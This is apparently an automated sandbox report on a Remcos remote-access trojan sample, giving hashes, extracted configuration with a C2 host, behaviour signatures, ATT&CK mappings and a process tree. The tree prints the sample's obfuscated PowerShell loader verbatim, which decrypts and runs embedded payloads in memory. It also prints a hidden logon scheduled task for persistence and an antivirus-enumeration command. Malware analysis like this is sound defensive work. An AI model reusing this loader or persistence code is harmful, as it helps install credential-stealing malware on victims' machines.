remcos | 1a5ad9ae7b0dcdc2edb7e93556f2c59c84f113879df380d95835fb8ea3914ed8

Resubmissions

15-02-2024 02:04

240215-chmlpaeg88 10

Analysis

max time kernel
449s
max time network
450s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
15-02-2024 02:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lods.cmd
Size

264KB
MD5

194118c43c65faad06bf5ff6cd9b52a2
SHA1

7bdf85b3968747acf21d37df5e56d54f8a0c7e62
SHA256

1a5ad9ae7b0dcdc2edb7e93556f2c59c84f113879df380d95835fb8ea3914ed8
SHA512

42a7d57520d68acfc79972e387cf6a9ca45b1159ee14ba1d6b4bc801d90d38e7eeb6dfd6aa3c039773cceb6d3a9223cc8459abd7661ae162b89644b6db8996b2
SSDEEP

6144:0ChPgq+rL7AAZG5R0Oscn3X/QOT31RvQ/3R:0uY105CO+aUR

Score

10^/10

remcos email collection rat

Malware Config

Extracted

Family

remcos

Botnet

email.imforums.in:3393

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-A0BFZP
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/2884-266-0x0000000000400000-0x0000000000457000-memory.dmp	MailPassView

Nirsoft 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2884-266-0x0000000000400000-0x0000000000457000-memory.dmp	Nirsoft
behavioral2/memory/3792-274-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	process
23	664	powershell.exe
25	664	powershell.exe
26	664	powershell.exe
30	664	powershell.exe
32	664	powershell.exe
34	664	powershell.exe
39	4664	powershell.exe
41	4664	powershell.exe
42	4664	powershell.exe
43	4664	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

powershell.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	powershell.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 api.ipify.org

flow	ioc
22	api.ipify.org

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 4664 set thread context of 2364	4664	powershell.exe	powershell.exe
PID 4664 set thread context of 2884	4664	powershell.exe	powershell.exe
PID 4664 set thread context of 3792	4664	powershell.exe	powershell.exe

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2076	4664	WerFault.exe	powershell.exe
1448	664	WerFault.exe	powershell.exe
5100	664	WerFault.exe	powershell.exe
4768	664	WerFault.exe	powershell.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

2844 timeout.exe
3844 timeout.exe
2000 timeout.exe

pid	process
2844	timeout.exe
3844	timeout.exe
2000	timeout.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4944	powershell.exe
4944	powershell.exe
4388	powershell.exe
4388	powershell.exe
4768	powershell.exe
4768	powershell.exe
4460	powershell.exe
4460	powershell.exe
664	powershell.exe
664	powershell.exe
4364	powershell.exe
4364	powershell.exe
540	powershell.exe
540	powershell.exe
3576	powershell.exe
3576	powershell.exe
4664	powershell.exe
4664	powershell.exe
1116	powershell.exe
1116	powershell.exe
2364	powershell.exe
2364	powershell.exe
3792	powershell.exe
3792	powershell.exe
2364	powershell.exe
2364	powershell.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exe

pid process

4664 powershell.exe
4664 powershell.exe
4664 powershell.exe
4664 powershell.exe

pid	process
4664	powershell.exe
4664	powershell.exe
4664	powershell.exe
4664	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4944	powershell.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeIncreaseQuotaPrivilege	4768	powershell.exe
Token: SeSecurityPrivilege	4768	powershell.exe
Token: SeTakeOwnershipPrivilege	4768	powershell.exe
Token: SeLoadDriverPrivilege	4768	powershell.exe
Token: SeSystemProfilePrivilege	4768	powershell.exe
Token: SeSystemtimePrivilege	4768	powershell.exe
Token: SeProfSingleProcessPrivilege	4768	powershell.exe
Token: SeIncBasePriorityPrivilege	4768	powershell.exe
Token: SeCreatePagefilePrivilege	4768	powershell.exe
Token: SeBackupPrivilege	4768	powershell.exe
Token: SeRestorePrivilege	4768	powershell.exe
Token: SeShutdownPrivilege	4768	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe
Token: SeSystemEnvironmentPrivilege	4768	powershell.exe
Token: SeRemoteShutdownPrivilege	4768	powershell.exe
Token: SeUndockPrivilege	4768	powershell.exe
Token: SeManageVolumePrivilege	4768	powershell.exe
Token: 33	4768	powershell.exe
Token: 34	4768	powershell.exe
Token: 35	4768	powershell.exe
Token: 36	4768	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeIncreaseQuotaPrivilege	4460	powershell.exe
Token: SeSecurityPrivilege	4460	powershell.exe
Token: SeTakeOwnershipPrivilege	4460	powershell.exe
Token: SeLoadDriverPrivilege	4460	powershell.exe
Token: SeSystemProfilePrivilege	4460	powershell.exe
Token: SeSystemtimePrivilege	4460	powershell.exe
Token: SeProfSingleProcessPrivilege	4460	powershell.exe
Token: SeIncBasePriorityPrivilege	4460	powershell.exe
Token: SeCreatePagefilePrivilege	4460	powershell.exe
Token: SeBackupPrivilege	4460	powershell.exe
Token: SeRestorePrivilege	4460	powershell.exe
Token: SeShutdownPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeSystemEnvironmentPrivilege	4460	powershell.exe
Token: SeRemoteShutdownPrivilege	4460	powershell.exe
Token: SeUndockPrivilege	4460	powershell.exe
Token: SeManageVolumePrivilege	4460	powershell.exe
Token: 33	4460	powershell.exe
Token: 34	4460	powershell.exe
Token: 35	4460	powershell.exe
Token: 36	4460	powershell.exe
Token: SeIncreaseQuotaPrivilege	4460	powershell.exe
Token: SeSecurityPrivilege	4460	powershell.exe
Token: SeTakeOwnershipPrivilege	4460	powershell.exe
Token: SeLoadDriverPrivilege	4460	powershell.exe
Token: SeSystemProfilePrivilege	4460	powershell.exe
Token: SeSystemtimePrivilege	4460	powershell.exe
Token: SeProfSingleProcessPrivilege	4460	powershell.exe
Token: SeIncBasePriorityPrivilege	4460	powershell.exe
Token: SeCreatePagefilePrivilege	4460	powershell.exe
Token: SeBackupPrivilege	4460	powershell.exe
Token: SeRestorePrivilege	4460	powershell.exe
Token: SeShutdownPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeSystemEnvironmentPrivilege	4460	powershell.exe
Token: SeRemoteShutdownPrivilege	4460	powershell.exe
Token: SeUndockPrivilege	4460	powershell.exe
Token: SeManageVolumePrivilege	4460	powershell.exe
Token: 33	4460	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exepowershell.execmd.execmd.exepowershell.execmd.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 4000 wrote to memory of 4344	4000	cmd.exe	cmd.exe
PID 4000 wrote to memory of 4344	4000	cmd.exe	cmd.exe
PID 4344 wrote to memory of 2440	4344	cmd.exe	cmd.exe
PID 4344 wrote to memory of 2440	4344	cmd.exe	cmd.exe
PID 4344 wrote to memory of 4944	4344	cmd.exe	powershell.exe
PID 4344 wrote to memory of 4944	4344	cmd.exe	powershell.exe
PID 4344 wrote to memory of 4944	4344	cmd.exe	powershell.exe
PID 4944 wrote to memory of 4388	4944	powershell.exe	powershell.exe
PID 4944 wrote to memory of 4388	4944	powershell.exe	powershell.exe
PID 4944 wrote to memory of 4388	4944	powershell.exe	powershell.exe
PID 4944 wrote to memory of 4768	4944	powershell.exe	powershell.exe
PID 4944 wrote to memory of 4768	4944	powershell.exe	powershell.exe
PID 4944 wrote to memory of 4768	4944	powershell.exe	powershell.exe
PID 4944 wrote to memory of 4460	4944	powershell.exe	powershell.exe
PID 4944 wrote to memory of 4460	4944	powershell.exe	powershell.exe
PID 4944 wrote to memory of 4460	4944	powershell.exe	powershell.exe
PID 4944 wrote to memory of 3860	4944	powershell.exe	cmd.exe
PID 4944 wrote to memory of 3860	4944	powershell.exe	cmd.exe
PID 4944 wrote to memory of 3860	4944	powershell.exe	cmd.exe
PID 3860 wrote to memory of 3980	3860	cmd.exe	cmd.exe
PID 3860 wrote to memory of 3980	3860	cmd.exe	cmd.exe
PID 3860 wrote to memory of 3980	3860	cmd.exe	cmd.exe
PID 3980 wrote to memory of 1308	3980	cmd.exe	cmd.exe
PID 3980 wrote to memory of 1308	3980	cmd.exe	cmd.exe
PID 3980 wrote to memory of 1308	3980	cmd.exe	cmd.exe
PID 3980 wrote to memory of 664	3980	cmd.exe	powershell.exe
PID 3980 wrote to memory of 664	3980	cmd.exe	powershell.exe
PID 3980 wrote to memory of 664	3980	cmd.exe	powershell.exe
PID 664 wrote to memory of 4364	664	powershell.exe	powershell.exe
PID 664 wrote to memory of 4364	664	powershell.exe	powershell.exe
PID 664 wrote to memory of 4364	664	powershell.exe	powershell.exe
PID 4344 wrote to memory of 2000	4344	cmd.exe	timeout.exe
PID 4344 wrote to memory of 2000	4344	cmd.exe	timeout.exe
PID 664 wrote to memory of 540	664	powershell.exe	powershell.exe
PID 664 wrote to memory of 540	664	powershell.exe	powershell.exe
PID 664 wrote to memory of 540	664	powershell.exe	powershell.exe
PID 664 wrote to memory of 3576	664	powershell.exe	powershell.exe
PID 664 wrote to memory of 3576	664	powershell.exe	powershell.exe
PID 664 wrote to memory of 3576	664	powershell.exe	powershell.exe
PID 664 wrote to memory of 2216	664	powershell.exe	cmd.exe
PID 664 wrote to memory of 2216	664	powershell.exe	cmd.exe
PID 664 wrote to memory of 2216	664	powershell.exe	cmd.exe
PID 2216 wrote to memory of 4692	2216	cmd.exe	WMIC.exe
PID 2216 wrote to memory of 4692	2216	cmd.exe	WMIC.exe
PID 2216 wrote to memory of 4692	2216	cmd.exe	WMIC.exe
PID 664 wrote to memory of 2488	664	powershell.exe	cmd.exe
PID 664 wrote to memory of 2488	664	powershell.exe	cmd.exe
PID 664 wrote to memory of 2488	664	powershell.exe	cmd.exe
PID 2488 wrote to memory of 3004	2488	cmd.exe	cmd.exe
PID 2488 wrote to memory of 3004	2488	cmd.exe	cmd.exe
PID 2488 wrote to memory of 3004	2488	cmd.exe	cmd.exe
PID 3004 wrote to memory of 2032	3004	cmd.exe	cmd.exe
PID 3004 wrote to memory of 2032	3004	cmd.exe	cmd.exe
PID 3004 wrote to memory of 2032	3004	cmd.exe	cmd.exe
PID 3004 wrote to memory of 4664	3004	cmd.exe	powershell.exe
PID 3004 wrote to memory of 4664	3004	cmd.exe	powershell.exe
PID 3004 wrote to memory of 4664	3004	cmd.exe	powershell.exe
PID 4664 wrote to memory of 1116	4664	powershell.exe	powershell.exe
PID 4664 wrote to memory of 1116	4664	powershell.exe	powershell.exe
PID 4664 wrote to memory of 1116	4664	powershell.exe	powershell.exe
PID 4664 wrote to memory of 2364	4664	powershell.exe	powershell.exe
PID 4664 wrote to memory of 2364	4664	powershell.exe	powershell.exe
PID 4664 wrote to memory of 2364	4664	powershell.exe	powershell.exe
PID 4664 wrote to memory of 2364	4664	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lods.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lods.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:4344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\lods.cmd';$yDpz='IKCWFnKCWFvoKCWFkeKCWF'.Replace('KCWF', ''),'RXWQleXWQladLXWQlineXWQlsXWQl'.Replace('XWQl', ''),'GeXvGNtXvGNCXvGNurrXvGNenXvGNtPXvGNrXvGNocXvGNesXvGNsXvGN'.Replace('XvGN', ''),'FrxAMfomBxAMfasxAMfe64xAMfStxAMfrxAMfinxAMfgxAMf'.Replace('xAMf', ''),'CrXNBTeaXNBTtXNBTeDXNBTecXNBTrypXNBTtXNBTorXNBT'.Replace('XNBT', ''),'CeDSsheDSsaneDSsgeDSseEeDSsxteDSseeDSsneDSssieDSsoneDSs'.Replace('eDSs', ''),'EnNMJVtNMJVryPNMJVoinNMJVtNMJV'.Replace('NMJV', ''),'DAdhwecAdhwompAdhwrAdhweAdhwssAdhw'.Replace('Adhw', ''),'SpWkTWlWkTWitWkTW'.Replace('WkTW', ''),'MCgUGaCgUGinCgUGMCgUGodCgUGuCgUGleCgUG'.Replace('CgUG', ''),'LoauLqjduLqj'.Replace('uLqj', ''),'TrZUBEanZUBEsfZUBEoZUBErmZUBEFZUBEinZUBEalZUBEBZUBEloZUBEckZUBE'.Replace('ZUBE', ''),'CopFJKYyFJKYToFJKY'.Replace('FJKY', ''),'ElLTAIeLTAImeLTAInLTAItAtLTAI'.Replace('LTAI', '');powershell -w hidden;function jErZG($xSDUT){$cRyDq=[System.Security.Cryptography.Aes]::Create();$cRyDq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cRyDq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cRyDq.Key=[System.Convert]::($yDpz[3])('nlftMe/+KZS0ywJx8vu78pDIl8AaOzKgZtZxqMq9lB8=');$cRyDq.IV=[System.Convert]::($yDpz[3])('qNVO13iwamE1laUPiVA0ow==');$ofBHL=$cRyDq.($yDpz[4])();$mDAXw=$ofBHL.($yDpz[11])($xSDUT,0,$xSDUT.Length);$ofBHL.Dispose();$cRyDq.Dispose();$mDAXw;}function agayp($xSDUT){$jmbnu=New-Object System.IO.MemoryStream(,$xSDUT);$wFcba=New-Object System.IO.MemoryStream;$adSek=New-Object System.IO.Compression.GZipStream($jmbnu,[IO.Compression.CompressionMode]::($yDpz[7]));$adSek.($yDpz[12])($wFcba);$adSek.Dispose();$jmbnu.Dispose();$wFcba.Dispose();$wFcba.ToArray();}$oFNMD=[System.IO.File]::($yDpz[1])([Console]::Title);$JFMmz=agayp (jErZG ([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 5).Substring(2))));$CdrWA=agayp (jErZG ([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 6).Substring(2))));[System.Reflection.Assembly]::($yDpz[10])([byte[]]$CdrWA).($yDpz[6]).($yDpz[0])($null,$null);[System.Reflection.Assembly]::($yDpz[10])([byte[]]$JFMmz).($yDpz[6]).($yDpz[0])($null,$null); "
3⤵
PID:2440

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\lods')
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 89398' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network89398Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network89398Man.cmd"
4⤵
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network89398Man.cmd"
5⤵
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network89398Man.cmd';$yDpz='IKCWFnKCWFvoKCWFkeKCWF'.Replace('KCWF', ''),'RXWQleXWQladLXWQlineXWQlsXWQl'.Replace('XWQl', ''),'GeXvGNtXvGNCXvGNurrXvGNenXvGNtPXvGNrXvGNocXvGNesXvGNsXvGN'.Replace('XvGN', ''),'FrxAMfomBxAMfasxAMfe64xAMfStxAMfrxAMfinxAMfgxAMf'.Replace('xAMf', ''),'CrXNBTeaXNBTtXNBTeDXNBTecXNBTrypXNBTtXNBTorXNBT'.Replace('XNBT', ''),'CeDSsheDSsaneDSsgeDSseEeDSsxteDSseeDSsneDSssieDSsoneDSs'.Replace('eDSs', ''),'EnNMJVtNMJVryPNMJVoinNMJVtNMJV'.Replace('NMJV', ''),'DAdhwecAdhwompAdhwrAdhweAdhwssAdhw'.Replace('Adhw', ''),'SpWkTWlWkTWitWkTW'.Replace('WkTW', ''),'MCgUGaCgUGinCgUGMCgUGodCgUGuCgUGleCgUG'.Replace('CgUG', ''),'LoauLqjduLqj'.Replace('uLqj', ''),'TrZUBEanZUBEsfZUBEoZUBErmZUBEFZUBEinZUBEalZUBEBZUBEloZUBEckZUBE'.Replace('ZUBE', ''),'CopFJKYyFJKYToFJKY'.Replace('FJKY', ''),'ElLTAIeLTAImeLTAInLTAItAtLTAI'.Replace('LTAI', '');powershell -w hidden;function jErZG($xSDUT){$cRyDq=[System.Security.Cryptography.Aes]::Create();$cRyDq.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cRyDq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cRyDq.Key=[System.Convert]::($yDpz[3])('nlftMe/+KZS0ywJx8vu78pDIl8AaOzKgZtZxqMq9lB8=');$cRyDq.IV=[System.Convert]::($yDpz[3])('qNVO13iwamE1laUPiVA0ow==');$ofBHL=$cRyDq.($yDpz[4])();$mDAXw=$ofBHL.($yDpz[11])($xSDUT,0,$xSDUT.Length);$ofBHL.Dispose();$cRyDq.Dispose();$mDAXw;}function agayp($xSDUT){$jmbnu=New-Object System.IO.MemoryStream(,$xSDUT);$wFcba=New-Object System.IO.MemoryStream;$adSek=New-Object System.IO.Compression.GZipStream($jmbnu,[IO.Compression.CompressionMode]::($yDpz[7]));$adSek.($yDpz[12])($wFcba);$adSek.Dispose();$jmbnu.Dispose();$wFcba.Dispose();$wFcba.ToArray();}$oFNMD=[System.IO.File]::($yDpz[1])([Console]::Title);$JFMmz=agayp (jErZG ([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 5).Substring(2))));$CdrWA=agayp (jErZG ([Convert]::($yDpz[3])([System.Linq.Enumerable]::($yDpz[13])($oFNMD, 6).Substring(2))));[System.Reflection.Assembly]::($yDpz[10])([byte[]]$CdrWA).($yDpz[6]).($yDpz[0])($null,$null);[System.Reflection.Assembly]::($yDpz[10])([byte[]]$JFMmz).($yDpz[6]).($yDpz[0])($null,$null); "
6⤵
PID:1308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network89398Man')
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 89398' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network89398Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value
7⤵
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value
8⤵
PID:4692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ADE_VWUXQDtZyBdZTGDaQ98p.bat"
7⤵
- Suspicious use of WriteProcessMemory
PID:2488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADE_VWUXQDtZyBdZTGDaQ98p.bat
8⤵
- Suspicious use of WriteProcessMemory
PID:3004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\ADE_VWUXQDtZyBdZTGDaQ98p.bat';$lBXu='InynCnvokynCneynCn'.Replace('ynCn', ''),'CxcYPopxcYPyxcYPToxcYP'.Replace('xcYP', ''),'ChKZkoaKZkongeKZkoExKZkotKZkoeKZkonsKZkoioKZkonKZko'.Replace('KZko', ''),'FiWZqromiWZqBiWZqaiWZqseiWZq6iWZq4SiWZqtriWZqingiWZq'.Replace('iWZq', ''),'DFqisecoFqismpFqisreFqisssFqis'.Replace('Fqis', ''),'ReapgNOdLipgNOnpgNOespgNO'.Replace('pgNO', ''),'GeZsdeeZsdteZsdCueZsdrreeZsdneZsdteZsdPreZsdoceeZsdsseZsd'.Replace('eZsd', ''),'LoalZWcdlZWc'.Replace('lZWc', ''),'TraxmugnxmugsfxmugorxmugmFxmugixmugnaxmuglBlxmugocxmugkxmug'.Replace('xmug', ''),'EpeOznpeOztpeOzrpeOzyPopeOzintpeOz'.Replace('peOz', ''),'SpldGSZitdGSZ'.Replace('dGSZ', ''),'EyYIQleyYIQmyYIQenyYIQtAyYIQtyYIQ'.Replace('yYIQ', ''),'CrdxJReadxJRtedxJRDedxJRcrdxJRypdxJRtdxJRodxJRrdxJR'.Replace('dxJR', ''),'MaMMbXinMMMbXoMMbXdMMbXuMMbXleMMbX'.Replace('MMbX', '');powershell -w hidden;function tNTwQ($yIpxO){$SqKxW=[System.Security.Cryptography.Aes]::Create();$SqKxW.Mode=[System.Security.Cryptography.CipherMode]::CBC;$SqKxW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$SqKxW.Key=[System.Convert]::($lBXu[3])('VyPC6Jm9Yx5irR3iz2SLCV1GgPmGUO2ZQA5T+beBR+U=');$SqKxW.IV=[System.Convert]::($lBXu[3])('w19FTJINoVo/SsJOWJtWDA==');$jLdqY=$SqKxW.($lBXu[12])();$VgiBw=$jLdqY.($lBXu[8])($yIpxO,0,$yIpxO.Length);$jLdqY.Dispose();$SqKxW.Dispose();$VgiBw;}function Drgju($yIpxO){$jctpV=New-Object System.IO.MemoryStream(,$yIpxO);$xjENg=New-Object System.IO.MemoryStream;$hRiVe=New-Object System.IO.Compression.GZipStream($jctpV,[IO.Compression.CompressionMode]::($lBXu[4]));$hRiVe.($lBXu[1])($xjENg);$hRiVe.Dispose();$jctpV.Dispose();$xjENg.Dispose();$xjENg.ToArray();}$oEsJy=[System.IO.File]::($lBXu[5])([Console]::Title);$YSEgT=Drgju (tNTwQ ([Convert]::($lBXu[3])([System.Linq.Enumerable]::($lBXu[11])($oEsJy, 5).Substring(2))));$vqptu=Drgju (tNTwQ ([Convert]::($lBXu[3])([System.Linq.Enumerable]::($lBXu[11])($oEsJy, 6).Substring(2))));[System.Reflection.Assembly]::($lBXu[7])([byte[]]$vqptu).($lBXu[9]).($lBXu[0])($null,$null);[System.Reflection.Assembly]::($lBXu[7])([byte[]]$YSEgT).($lBXu[9]).($lBXu[0])($null,$null); "
9⤵
PID:2032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
9⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
10⤵
- Suspicious behavior: EnumeratesProcesses
PID:1116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\gnviahcnwphcnrspgsv"
10⤵
- Suspicious behavior: EnumeratesProcesses
PID:2364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\rpabbamgkxzhxxotxcigtr"
10⤵
- Accesses Microsoft Outlook accounts
PID:2884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\tjftbsxiyfrmzecxhndhewnel"
10⤵
PID:3192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\tjftbsxiyfrmzecxhndhewnel"
10⤵
- Suspicious behavior: EnumeratesProcesses
PID:3792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 2244
10⤵
- Program crash
PID:2076

C:\Windows\SysWOW64\timeout.exe
timeout /nobreak /t 1
9⤵
- Delays execution with timeout.exe
PID:2844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 3344
7⤵
- Program crash
PID:1448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 3420
7⤵
- Program crash
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 3356
7⤵
- Program crash
PID:4768

C:\Windows\SysWOW64\timeout.exe
timeout /nobreak /t 1
6⤵
- Delays execution with timeout.exe
PID:3844

C:\Windows\system32\timeout.exe
timeout /nobreak /t 1
3⤵
- Delays execution with timeout.exe
PID:2000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4664 -ip 4664
1⤵
PID:1736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 664 -ip 664
1⤵
PID:2832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 664 -ip 664
1⤵
PID:1952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 664 -ip 664
1⤵
PID:5008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
